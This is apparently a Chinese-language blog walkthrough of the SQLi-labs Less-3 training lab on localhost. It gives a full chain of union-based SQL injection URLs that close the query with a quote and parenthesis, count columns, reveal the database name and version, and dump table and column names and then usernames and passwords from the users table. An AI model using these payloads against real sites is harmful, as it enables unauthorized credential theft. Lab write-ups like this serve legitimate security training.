SQLI-LABS Page 1 ——Less 03

最新推荐文章于 2022-11-09 13:34:22 发布
最新推荐文章于 2022-11-09 13:34:22 发布
阅读量123 收藏
点赞数 1
分类专栏: SQL注入 文章标签: less 前端 css
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_59098212/article/details/125223417
版权

1、判断是否动、静态页面

http://localhost:9898/Less-3/?/id=2;可以判断参数是id,id值不一样,显示页面不同

2.判断是否存在注入

可用\号来查看构造闭合,分别用http://localhost:9898/Less-3/?id=1') and 1=1-- qwe和http://localhost:9898/Less-3/?id=1') and 1=2-- qwe来进行探测

可以看到')构成闭合。

3.判断字段数

用order by判断字段数(二分法)

http://localhost:9898/Less-3/?id=1') order by 4-- qwe

 http://localhost:9898/Less-3/?id=1') order by 2-- qwe

http://localhost:9898/Less-3/?id=1') order by 3-- qwe

 说明字符数为3

4.判断显错位

http://localhost:9898/Less-3/?id=999') union select 1,2,3-- qwe

 结果显示回显点为2,3

5.判断库名和数据库版本

http://localhost:9898/Less-3/?id=999') union select 1,version(),database()-- qwe

 结果可发现当前数据库是security数据库,数据库版本是5.0以上。

6.判断表名

http://localhost:9898/Less-3/?id=999') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()-- qwe

用group_concat输出security数据库下的所有表。

7.判断列名

http://localhost:9898/Less-3/?id=999') union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'-- qwe

一般用户名和密码都在users表,所以爆users表。

8.寻找具体数据

?id=999') union select 1,group_concat(username),group_concat(password) from users-- qwe

 从users表中获取敏感信息。

至此,回显注入完成。

张潇晨
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
windows环境下安装sqli-labs
11-04
windows server 2012 环境下,安装sqli-labs的详细教程,适合新手小白,大神可以参考一下,有不足的地方请联系我。
初学SQLi-LABS过关分享Less-3
SenTouKiReI的博客
06-10 744
初学sql注入SQLi-LABS过关分享Less-3
sqli-labs-less-4图文详解,适合小白
yzcn
10-23 1345
Less-4 less1-3以发布,1-4题相关知识点在https://blog.csdn.net/qq_46432288/article/details/109226871中,点击查看吧!!! less-4与1-3方法基本一致,只是最开始的判断注入点有一点差别。 判断注入: http://127.0.0.1/sqli-labs-master/Less-4/?id=1 显示正常 http://127.0.0.1/sqli-labs-master/Less-4/?id=1’ 显示正常 http://12
sqli-labs Less-4
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
04-03 313
sqli-labs Less-4 本系列文章使用的靶场环境为sqli-labs 环境下载地址:https://github.com/Audi-1/sqli-labs 持续跟新,一直到通过此靶场为止 1.判断注入类型 index.php?id=1" 单引号回显正常,双引号会报错 然后根据报错,我们可以得知这个sql注入页面的使用双引号和括号进行闭合。 2.猜...
sqli-labs/Less-4
m0_71299382的博客
11-09 87
sqli-labs第四关
springMVC之常用注解
qq_32658439的博客
08-15 92
RequestMapping请求映射方式 1.规则: @RequestMapping可以设置在类上,也可以设置在方法上 请求的映射规则是:类上的RequestMapping + ‘/’+ 方法上的RequestMapping 如果没有写 / ,SpringMVC会自动补全 类上的RequestMapping可以省略,这时直接用方法的RequestMapping访问 路径不可重...
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
jeakinscheung-sqli-labs-php7-master.zip
03-16
sqli创建数据库连接发现连接不了,这种原因是现在大部分人用的php7,原版的sqli只支持php5.
ServerScoket与Socket的关系
zsxdmsr115的博客
01-19 842
SeverSocket就还好比站在酒店门口的迎宾小姐,而Socket好比顾客,迎宾小姐的工作就是迎接到来的顾客。 下面我们言归正传。 创建服务器:ServerSocket serverSocket = new ServerSocket(端口号);我们可以创建一个工具类专门用来读数据这里写代码片 public class Util(){ public static String
tomcat启动时出现了Failed to start component [StandardEngine[Catalina].StandardHost[localhost]]
xhudqlg的博客
08-09 1万+
    tomcat启动:Failed to start component [StandardEngine[Catalina].StandardHost[localhost].StandardContext[]] java.util.concurrent.ExecutionException: org.apache.catalina.LifecycleException: Failed t...
sqli-labs (less1-less4)
Xi4or0uji
07-24 1697
就只是随便记一记 less 1 get方法的引号闭合 id=1'有报错,证明有注入点,然后接下来是看一下有多少列 ?id=-1' union select 1,2,3--+' 这里我们如果只是写select后面加三个以下数字都会报错,证明里面是有三列的,用order by 也可以查出来 剩下的就是爆数据库,表,字段,值了 爆数据库 ?id=-1' union select 1,gr...
sqli-labs—————Less-4
Fly_鹏程万里
05-08 637
Less4根据要求传入参数id,数据类型numeric添加单引号、and 1=1  、and 1=2进行测试感觉是不是非常奇怪,为什么都是正确显示页面呢?我们不妨再试试双引号注入代码之后,我们得到了下面这个错误You have an error in your SQL syntax; check the manual that corresponds to your MySQL server ve...
通过sqli-labs学习sql注入——基础挑战之less1-10
热门推荐
giantbranch的专栏
05-02 5万+
欢迎光顾我的新博客:https://www.giantbranch.cn 本文链接:http://blog.csdn.net/u012763794/article/details/51207833 虽然sql注入接触过不少,其实也不太多,但是不系统,那就通过sqli-libs系统学习总结一下吧 注:第一个就说得详细一点,后面的有新知识才会说,所以第一个一定要看!!!如果第一个还有不明白的地方...
Sqli-labs之Less1-10
Mi1k7ea
04-14 4503
为了更好地学习SQL注入,便从sqli-labs开始入手吧。很多东西都是不懂,所以也是从各位前辈、大牛的博客以及书籍中去学习,将自己学到的都记录一下,以便以后的查看。同时也希望各位能够多多给点指导,让本人能够更好地掌握各种方法技巧等等。 为了更方便地实现操作,直接用Firefox的HackBar插件来操作~ Less1--基于错误的单引号字符型注入 直接在url中输入?id=1可以看
Sqli-Labs之less-3
ISNS的博客
02-05 1082
说在开头:文章是我通过查询资料后按照自己的理解总结出来的,所以如果有说法不对的地方,欢迎大佬指正~ 目前看来,这几关都是基于less-1的思路,所以详细过程参见: Sqli-Labs之less-1 less-3的主要的变化还是在于注入点的判断: 后续的操作就一样了: ...
Nginx将请求转发至后端应该怎么做?
J_Lee
10-29 1万+
Nginx将请求转发至后端应该怎么做?
sqli less-03
ANYOUZHEN的博客
04-30 813
老规矩,输入id=1 输入id=1’ 查看错误提示 查看源码,猜测可能要在1‘后面加) 查询列表数,发现为3 ?id=1') order by 3--+ch 发现列表为3,接下来就是常规操作了,首先使用联合查询?id=-1') union select 1,2,3--+ 接下来查询数据库名字?id=-1') union select 1,2,database()--+ 然后查询表?id=-1') union select 1,2,group_concat(ta.
sqli-labs-master/Less-17
最新发布
07-28
Less-17 是一个 SQL 注入实验,它位于 sqli-labs-master 实验室的目录中。在这个实验中,你可以学习和实践 SQL 注入攻击的技术。 SQL 注入是一种常见的网络安全漏洞,它允许攻击者通过在应用程序的输入字段中注入...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值